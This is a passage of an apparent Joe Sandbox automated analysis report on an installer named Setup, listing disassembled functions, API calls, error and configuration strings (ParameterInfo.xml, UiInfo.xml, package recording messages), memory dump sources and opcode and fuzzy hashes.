                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$H_prolog3$AllocCloseException@8HandleModuleNamePathPointerReadRelativeStringThrow
                                                                                              • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                                                              • API String ID: 3768868350-4172873023
                                                                                              • Opcode ID: db7b7535d5f4e80692fee94d8720676349c0915cb8c6416989405006c6e4cc5a
                                                                                              • Instruction ID: 644dff58a14553ea3a10312725b9e789657160b999c573cd0ec1bc5c3dc3dbbc
                                                                                              • Opcode Fuzzy Hash: db7b7535d5f4e80692fee94d8720676349c0915cb8c6416989405006c6e4cc5a
                                                                                              • Instruction Fuzzy Hash: 5D816B71A00209EFCF10DFA8C9859EEBBB9BF19318F14492AE511B7B50C734DA15CBA5
                                                                                              Function 6C8FA78F Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 160COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8FA796
                                                                                                • Part of subcall function 6C8CC5D4: __EH_prolog3.LIBCMT ref: 6C8CC5DB
                                                                                                • Part of subcall function 6C8CC5D4: GetLastError.KERNEL32 ref: 6C8CC609
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C901236: __EH_prolog3.LIBCMT ref: 6C90123D
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA83B
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA8F4
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA95B
                                                                                              Strings
                                                                                              • Failed to record DisplayedLcidId, xrefs: 6C8FA855
                                                                                              • Failed to record IsRetailBuild, xrefs: 6C8FA975
                                                                                              • Failed to record PackageName, xrefs: 6C8FA7B8
                                                                                              • Failed to record InstallerVersion, xrefs: 6C8FA8B0
                                                                                              • Failed to record PackageVersion, xrefs: 6C8FA7F7
                                                                                              • Failed to record PatchType, xrefs: 6C8FA90E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3Last
                                                                                              • String ID: Failed to record DisplayedLcidId$Failed to record InstallerVersion$Failed to record IsRetailBuild$Failed to record PackageName$Failed to record PackageVersion$Failed to record PatchType
                                                                                              • API String ID: 685212868-335235891
                                                                                              • Opcode ID: 121fbe3372ceed56125f02d21e768e01a52bed72605601442e803946a10610ee
                                                                                              • Instruction ID: 0fd2cad6b5f3ae47638513eb2933ac03309dc56ae43e403587ebe251f0f55bec
                                                                                              • Opcode Fuzzy Hash: 121fbe3372ceed56125f02d21e768e01a52bed72605601442e803946a10610ee
                                                                                              • Instruction Fuzzy Hash: 87518771200208BFDB20DFA5CA45ACE3B7ABF55398F114928B424DBB90C774E616DBA0
                                                                                              Function 6C8FA2DD Relevance: 16.8, APIs: 5, Strings: 6, Instructions: 271COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C8CC53D: GetLastError.KERNEL32(?,6C8FA320,38D98A99,?,?), ref: 6C8CC55E
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C901236: __EH_prolog3.LIBCMT ref: 6C90123D
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA393
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA434
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA4A7
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA511
                                                                                              • GetLastError.KERNEL32 ref: 6C8FA5A5
                                                                                              Strings
                                                                                              • Failed to record StartSession, xrefs: 6C8FA322
                                                                                              • Failed to record SetUserId, xrefs: 6C8FA3C0
                                                                                              • Failed to record StartupAppid, xrefs: 6C8FA4C1
                                                                                              • Failed to record MPC, xrefs: 6C8FA5BB
                                                                                              • Failed to record SetMachineId, xrefs: 6C8FA461
                                                                                              • Failed to record current state name, xrefs: 6C8FA52B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$H_prolog3
                                                                                              • String ID: Failed to record MPC$Failed to record SetMachineId$Failed to record SetUserId$Failed to record StartSession$Failed to record StartupAppid$Failed to record current state name
                                                                                              • API String ID: 3502553090-2804495384
                                                                                              • Opcode ID: 9088dc46fbaf37cc30954bbd254b67b364b5cf270f25ceac21c42bf5225ca38a
                                                                                              • Instruction ID: 84647e7bddbd5edf92b1e8ed7a8ab9fbbc956f59a07d4ca0648324ee26c60fcb
                                                                                              • Opcode Fuzzy Hash: 9088dc46fbaf37cc30954bbd254b67b364b5cf270f25ceac21c42bf5225ca38a
                                                                                              • Instruction Fuzzy Hash: CEA1C2312082419FD720CF69C945A9B7BE9BF653A8F100E2CF4A1D7BA1D774D909CB92
                                                                                              Function 6C8E2127 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 317COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E212E
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8E2484
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: CopyPackageFilesToDownloadLocation$DelayBetweenRetries$DownloadRetries$Items$No items found. The package must contain at least one item.$ParameterInfo.xml$true
                                                                                              • API String ID: 2489616738-2573507987
                                                                                              • Opcode ID: d831ebcdc94e9363603c3d092dd872bb417dd554b960585154276dff9ac8b45d
                                                                                              • Instruction ID: 8746a7a28cfa6f8df05b5392a8802e7986b847241e2a62d59d2e9691cd116643
                                                                                              • Opcode Fuzzy Hash: d831ebcdc94e9363603c3d092dd872bb417dd554b960585154276dff9ac8b45d
                                                                                              • Instruction Fuzzy Hash: 9DD1607090024ADFCF14CFA8CA85AEEBBB5BF59308F148599E414EB791C734DA05CBA1
                                                                                              Function 6C5D32BC Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 303COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D3302
                                                                                                • Part of subcall function 6C5D3679: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,6C5D332F,?), ref: 6C5D3683
                                                                                                • Part of subcall function 6C5D3679: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,6C5D332F,?), ref: 6C5D36B3
                                                                                                • Part of subcall function 6C5D3679: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 6C5D36D5
                                                                                                • Part of subcall function 6C5D3679: CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,6C5D332F,?), ref: 6C5D36E0
                                                                                              • EnterCriticalSection.KERNEL32(6C5F0168,?), ref: 6C5D3334
                                                                                              • LeaveCriticalSection.KERNEL32(6C5F0168,00000400,?), ref: 6C5D33F5
                                                                                              • LocalFree.KERNEL32(00000000), ref: 6C5D340C
                                                                                              • SetLastError.KERNEL32(00000057), ref: 6C5D341F
                                                                                                • Part of subcall function 6C5D17EB: malloc.MSVCRT ref: 6C5D17F6
                                                                                              • ctype.LIBCPMT ref: 6C5DEDDC
                                                                                                • Part of subcall function 6C5D343E: GetSystemTime.KERNEL32(00000000,00000838,00000000), ref: 6C5D347D
                                                                                                • Part of subcall function 6C5D343E: SystemTimeToFileTime.KERNEL32(00000000,00000000), ref: 6C5D348B
                                                                                                • Part of subcall function 6C5D30D2: InterlockedIncrement.KERNEL32(00000000), ref: 6C5D30D8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$CriticalProcessSectionSystem$CloseConvertCurrentEnterErrorFileFreeHandleIncrementInterlockedLastLeaveLocalOpenStringTokenctypemallocmemset
                                                                                              • String ID: %s_%s$W
                                                                                              • API String ID: 2889056228-4070589124
                                                                                              • Opcode ID: bbeb5d473a5bebc7e5e3069484f6d186a037620ae39d411f4c441d0e79cc7ead
                                                                                              • Instruction ID: 3cbd5d82864c0779acb6a08831bbca578cc0fcdc34fd9f3de9d36d7566267aea
                                                                                              • Opcode Fuzzy Hash: bbeb5d473a5bebc7e5e3069484f6d186a037620ae39d411f4c441d0e79cc7ead
                                                                                              • Instruction Fuzzy Hash: 31C1C031900358DADB61DF18CC40F9ABAF8BF44308F568499E455A3961CBB1EE89CF88
                                                                                              Function 6C912B01 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 345COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              • File lock postponed for %s., xrefs: 6C912D73
                                                                                              • File %s (%s), failed authentication. (Error = %d). It is recommended that you delete this file and retry setup again., xrefs: 6C912CF1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: File %s (%s), failed authentication. (Error = %d). It is recommended that you delete this file and retry setup again.$File lock postponed for %s.
                                                                                              • API String ID: 0-2368451233
                                                                                              • Opcode ID: fb9295ce24e099a4cf8bffee23f75770ee9be23095d82e3bc15994ffa9cae0d7
                                                                                              • Instruction ID: 0417f8c97072c22bc150ac29fd7ce0c68ddfa140a06e0cdd32c0577e95efb58a
                                                                                              • Opcode Fuzzy Hash: fb9295ce24e099a4cf8bffee23f75770ee9be23095d82e3bc15994ffa9cae0d7
                                                                                              • Instruction Fuzzy Hash: B9C1BF711086449FC320DF68C845A8FBBE8BFA6728F050B19F4A497F91C770D919CBA6
                                                                                              Function 6C8CAC58 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8CAC5F
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8CAD66
                                                                                              • SysAllocString.OLEAUT32(-00000010), ref: 6C8CAE70
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CAF3F
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8CD5: __EH_prolog3.LIBCMT ref: 6C8F8CDC
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8C8415: __EH_prolog3.LIBCMT ref: 6C8C841C
                                                                                              Strings
                                                                                              • schema validation failure: Invalid ExpressionAlias or Id not found: , xrefs: 6C8CAF84
                                                                                              • //*[@Id='%s'], xrefs: 6C8CAD26
                                                                                              • schema validation failure: ExpressionAlias's Id not defined or defined too many times: , xrefs: 6C8CAEBF
                                                                                              • ExpressionAlias, xrefs: 6C8CACAC, 6C8CADEA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$String$AllocException@8FreeThrow
                                                                                              • String ID: //*[@Id='%s']$ExpressionAlias$schema validation failure: ExpressionAlias's Id not defined or defined too many times: $schema validation failure: Invalid ExpressionAlias or Id not found:
                                                                                              • API String ID: 191698298-1025498756
                                                                                              • Opcode ID: ed2732535c675ac2837293f5995ce6023232cb3fbe981835b2db9dbb75f961d7
                                                                                              • Instruction ID: 6ec11075206db97b0c7c41ee8258559d4268059a7bf619ea7e37ba9da6f780bc
                                                                                              • Opcode Fuzzy Hash: ed2732535c675ac2837293f5995ce6023232cb3fbe981835b2db9dbb75f961d7
                                                                                              • Instruction Fuzzy Hash: 1BC17071900249EFCB10DFE8CA849EEBBB5BF55308F244969E411EB741C735DA09DB61
                                                                                              Function 6C90D446 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 206COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C90D44D
                                                                                              • GetCommandLineW.KERNEL32(0000006C,6C90B3B6,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C90D48E
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8C3A16: __EH_prolog3.LIBCMT ref: 6C8C3A1D
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C90D4EF
                                                                                              • CoUninitialize.COMBASE(?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C90D6A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CommandH_prolog3_catchInitializeLineUninitialize
                                                                                              • String ID: Hide$SplashScreen$UiInfo.xml$nosplashscreen
                                                                                              • API String ID: 1338294413-2964427009
                                                                                              • Opcode ID: 6696892b680a02607f0213ac42719fd9a0f3779ec89a595df7d698d63fc82ff0
                                                                                              • Instruction ID: 40a00a526a07c760bc3005611838cb6df1413d84399866c221fb6f9513d9408b
                                                                                              • Opcode Fuzzy Hash: 6696892b680a02607f0213ac42719fd9a0f3779ec89a595df7d698d63fc82ff0
                                                                                              • Instruction Fuzzy Hash: 81819171A04248DFDF10CFE8C944BDEBBB8AF15308F1445A9E454ABB81CB75DA09CBA1
                                                                                              Function 6C8C9C3A Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 174COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C9C41
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8C9D24
                                                                                              • __fassign.LIBCMT ref: 6C8C9D58
                                                                                              • _wcstoul.LIBCMT ref: 6C8C9D65
                                                                                                • Part of subcall function 6C91B6D0: wcstoxl.LIBCMT ref: 6C91B6E0
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                              • __get_errno.LIBCMT ref: 6C8C9D74
                                                                                              Strings
                                                                                              • schema validation failure: non-numeric value, %s, for %s, xrefs: 6C8C9DB1
                                                                                              • ", xrefs: 6C8C9D88
                                                                                              • schema validation failure: empty value, %s, for %s, xrefs: 6C8C9CA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw__fassign__get_errno_wcstoulwcstoxl
                                                                                              • String ID: "$schema validation failure: empty value, %s, for %s$schema validation failure: non-numeric value, %s, for %s
                                                                                              • API String ID: 2631245360-326575430
                                                                                              • Opcode ID: 1d9c6ef3d13a34ce02b9c59b41c153fffac2bbae6e81e672b679dcdadca0513e
                                                                                              • Instruction ID: cae07f709545c4854f120134270f13f897343375770197025f25e395320963dc
                                                                                              • Opcode Fuzzy Hash: 1d9c6ef3d13a34ce02b9c59b41c153fffac2bbae6e81e672b679dcdadca0513e
                                                                                              • Instruction Fuzzy Hash: 82619571900149EFCF10DFE8C9849EEBBB9BF15318F14899AE111A7B41D734DA09CB62
                                                                                              Function 6C8F51C0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 154COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C8F51C7
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C8F51DC
                                                                                                • Part of subcall function 6C918859: SysStringByteLen.OLEAUT32(00000000), ref: 6C918860
                                                                                                • Part of subcall function 6C918859: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 6C918869
                                                                                                • Part of subcall function 6C8CB00D: __EH_prolog3.LIBCMT ref: 6C8CB014
                                                                                                • Part of subcall function 6C8CB00D: SysFreeString.OLEAUT32(?), ref: 6C8CB044
                                                                                              • CoUninitialize.COMBASE(?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml,?,?), ref: 6C8F538C
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA6DB: __EH_prolog3.LIBCMT ref: 6C8CA6E2
                                                                                                • Part of subcall function 6C8CA6DB: SysFreeString.OLEAUT32(?), ref: 6C8CA72B
                                                                                                • Part of subcall function 6C8CA7C3: __EH_prolog3.LIBCMT ref: 6C8CA7CA
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8F5343
                                                                                              Strings
                                                                                              • //BlockIf[@ID], xrefs: 6C8F5218
                                                                                              • ParameterInfo.xml, xrefs: 6C8F52FE
                                                                                              • BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID=", xrefs: 6C8F52CB
                                                                                              • #(loc., xrefs: 6C8F52B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3String$ByteFree$AllocException@8H_prolog3_catchInitializeThrowUninitialize
                                                                                              • String ID: #(loc.$//BlockIf[@ID]$BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID="$ParameterInfo.xml
                                                                                              • API String ID: 3727013976-3244902561
                                                                                              • Opcode ID: 90e6bcfca06097c0fe416f5de155401fb1d34b537aadf6f11ba8ee84e78e7dff
                                                                                              • Instruction ID: f7c7e8c755b9a7ded4bf80b96d97327804afd19da3cb139e7913d598b924747b
                                                                                              • Opcode Fuzzy Hash: 90e6bcfca06097c0fe416f5de155401fb1d34b537aadf6f11ba8ee84e78e7dff
                                                                                              • Instruction Fuzzy Hash: D351637190424CDFCB10DBE8CA84ADEBBB5AF15318F248569E125E7B80C774DA4ACB61
                                                                                              Function 6C8D50D5 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 140comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C8D50DC
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8380: __EH_prolog3.LIBCMT ref: 6C8F8387
                                                                                                • Part of subcall function 6C8C388B: __EH_prolog3.LIBCMT ref: 6C8C3892
                                                                                              • CoInitialize.OLE32(00000000), ref: 6C8D512A
                                                                                              • CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,00000738,?,?,?,00000000,?,?,?,38D98A99,?,?,?), ref: 6C8D5148
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D5270
                                                                                                • Part of subcall function 6C8D54B1: __EH_prolog3.LIBCMT ref: 6C8D54B8
                                                                                                • Part of subcall function 6C8D54B1: __CxxThrowException@8.LIBCMT ref: 6C8D5540
                                                                                              • CoUninitialize.COMBASE(02F92298,?,succeeded,?,?,?,00000000,?,?,?,38D98A99,?,?,?), ref: 6C8D51E6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw$CreateH_prolog3_catchInitializeInstanceUninitialize
                                                                                              • String ID: IronMan::LocalizedData::CreateLocalizedData$succeeded$threw exception
                                                                                              • API String ID: 4097945976-352736096
                                                                                              • Opcode ID: 6b2e3742f98a86ae9825ec5acac1c091a3d7c4d74f0d643a01b7c54819f87fe8
                                                                                              • Instruction ID: 95203b4699fe8107627b18452559b2be40eae6261f0232d2771b557d8f237725
                                                                                              • Opcode Fuzzy Hash: 6b2e3742f98a86ae9825ec5acac1c091a3d7c4d74f0d643a01b7c54819f87fe8
                                                                                              • Instruction Fuzzy Hash: 8D514D7090020DEFCB10CFA8C984ADE7B79AF45318F14895AF115EB750C735EA49CBA1
                                                                                              Function 6C9159F8 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C9159FF
                                                                                              • GetCommandLineW.KERNEL32(?), ref: 6C915A64
                                                                                                • Part of subcall function 6C8FFF21: _wcsnlen.LIBCMT ref: 6C8FFF54
                                                                                                • Part of subcall function 6C8FFF21: _memcpy_s.LIBCMT ref: 6C8FFF8A
                                                                                              Strings
                                                                                              • - to be downloaded, xrefs: 6C915B05
                                                                                              • - available locally, xrefs: 6C915AEC
                                                                                              • - available but not verified yet, xrefs: 6C915ADC
                                                                                              • - available locally and verified., xrefs: 6C915AC2
                                                                                              • not locally available, but no URL to bedownloaded - error!, xrefs: 6C915B13
                                                                                              • - payload not required for this item to perform action., xrefs: 6C915A2C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
